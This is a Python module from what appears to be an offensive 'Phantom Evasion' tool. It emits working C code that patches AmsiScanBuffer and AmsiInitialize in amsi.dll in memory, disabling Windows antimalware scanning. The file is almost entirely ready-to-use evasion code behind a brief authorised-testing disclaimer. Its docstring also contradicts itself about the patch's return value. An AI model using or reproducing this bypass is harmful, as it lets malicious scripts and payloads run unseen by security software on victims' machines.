"""
Phantom Evasion - AMSI (Antimalware Scan Interface) Bypass

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_amsi_patch() -> Dict[str, Any]:
    """Generate C code that patches ``AmsiScanBuffer`` to always return S_OK / clean.

    The AMSI bypass overwrites the first few bytes of ``AmsiScanBuffer`` in
    ``amsi.dll`` so it immediately returns ``E_INVALIDARG`` (0x80070057),
    which causes callers (e.g. PowerShell) to treat every scan as if the
    buffer was invalid – effectively disabling AMSI scanning.

    The patch emitted is:
        ``B8 57 00 07 80`` – mov eax, 0x80070057  (E_INVALIDARG)
        ``C3``             – ret

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
#ifndef __PHANTOM_AMSI_DEFINED__
#define __PHANTOM_AMSI_DEFINED__
// AMSI Bypass – Patch AmsiScanBuffer – generated by Phantom Evasion
// Layer 3 – ETW/AMSI Bypass
// Patches AmsiScanBuffer in amsi.dll to return E_INVALIDARG,
// causing all AMSI scan results to be ignored by the calling host.

#include <windows.h>

static BOOL patch_amsi_scan_buffer(void) {
    HMODULE hAmsi = LoadLibraryA("amsi.dll");
    if (!hAmsi) return FALSE;   // AMSI not loaded – nothing to patch

    FARPROC pAmsiScanBuffer = GetProcAddress(hAmsi, "AmsiScanBuffer");
    if (!pAmsiScanBuffer) return FALSE;

    // Patch: mov eax, 0x80070057 (E_INVALIDARG); ret
    // B8 57 00 07 80 C3
    BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };

    DWORD old_protect = 0;
    if (!VirtualProtect((LPVOID)pAmsiScanBuffer, sizeof(patch),
                        PAGE_EXECUTE_READWRITE, &old_protect))
        return FALSE;

    memcpy((LPVOID)pAmsiScanBuffer, patch, sizeof(patch));
    VirtualProtect((LPVOID)pAmsiScanBuffer, sizeof(patch),
                   old_protect, &old_protect);

    FlushInstructionCache(GetCurrentProcess(),
                          (LPVOID)pAmsiScanBuffer, sizeof(patch));
    return TRUE;
}

// Alternative: also patch AmsiInitialize so AMSI fails to initialise at all.
static BOOL disable_amsi_init(void) {
    HMODULE hAmsi = GetModuleHandleA("amsi.dll");
    if (!hAmsi) return FALSE;

    FARPROC pAmsiInit = GetProcAddress(hAmsi, "AmsiInitialize");
    if (!pAmsiInit) return FALSE;

    // xor eax, eax (return 0 / S_OK without doing anything); ret
    BYTE patch[] = { 0x33, 0xC0, 0xC3 };

    DWORD old_protect = 0;
    if (!VirtualProtect((LPVOID)pAmsiInit, sizeof(patch),
                        PAGE_EXECUTE_READWRITE, &old_protect))
        return FALSE;

    memcpy((LPVOID)pAmsiInit, patch, sizeof(patch));
    VirtualProtect((LPVOID)pAmsiInit, sizeof(patch),
                   old_protect, &old_protect);
    return TRUE;
}
#endif /* __PHANTOM_AMSI_DEFINED__ */
"""

    return {
        "code": code,
        "description": "Patch AmsiScanBuffer (return E_INVALIDARG) to disable AMSI scanning",
        "layer": "Layer 3 - ETW/AMSI Bypass",
        "name": "patch_amsi",
    }
